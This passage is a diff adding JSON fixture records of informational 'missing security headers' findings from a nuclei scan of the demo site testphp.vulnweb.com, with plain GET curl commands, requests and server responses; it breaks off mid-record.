+{ + "model": "startScan.vulnerability", + "pk": 777, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:41:58.999Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 778, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:41:59.176Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 779, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:41:59.335Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 780, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:41:59.492Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 781, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:41:59.654Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 782, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:59.818Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 783, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:41:59.981Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 784, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:42:00.193Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 785, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:42:00.391Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 786, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:42:00.566Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 787, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:42:00.728Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 788, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:42:00.891Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 789, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:42:01.059Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 790, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:42:01.228Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: 